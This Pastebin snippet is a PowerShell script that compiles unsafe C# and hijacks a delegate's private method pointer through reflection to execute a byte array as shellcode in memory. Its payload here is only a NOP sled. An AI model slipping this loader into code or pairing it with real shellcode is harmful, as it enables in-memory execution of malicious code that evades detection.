SHARE
TWEET

Executing Shellcode in Powershell via C# Delegate

CrazyDave137 Jul 12th, 2013 92 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Thanks to http://www.atrevido.net/blog/2005/01/28/Inline+X86+ASM+In+C.aspx
  2. $code = @"
  3. namespace Danger {
  4.    using System;
  5.    using System.Reflection;
  6.    
  7.    
  8.    public class Danger {
  9.        public delegate uint SillyDelegate();
  10.        static uint PlaceHolder1() { return 0; }
  11.    
  12.        public unsafe static uint WillRobinson(Byte[] code) {
  13.        
  14.            fixed (byte* startAddress = &code[0]) {
  15.                Type delType = typeof(Delegate);
  16.                FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic | BindingFlags.Instance);
  17.            
  18.                SillyDelegate del = new SillyDelegate(PlaceHolder1);
  19.                _methodPtr.SetValue(del, (IntPtr) startAddress);
  20.                
  21.                return del();
  22.            }
  23.        }
  24.    }
  25. }
  26. "@
  27. #NOP Sled
  28. $shellcode = "909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090"
  29. $test = Convert-HexStringToByteArray $shellcode
  30. #the function Convert-HexStringToByteArray comes from someone else...don't have the reference at the moment.
  31.  
  32. $options = New-Object System.CodeDom.Compiler.CompilerParameters
  33. $options.CompilerOptions = "/unsafe"
  34. Add-Type -TypeDefinition $code -CompilerParameters $options
  35.  
  36. [Danger.Danger]::WillRobinson($test)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top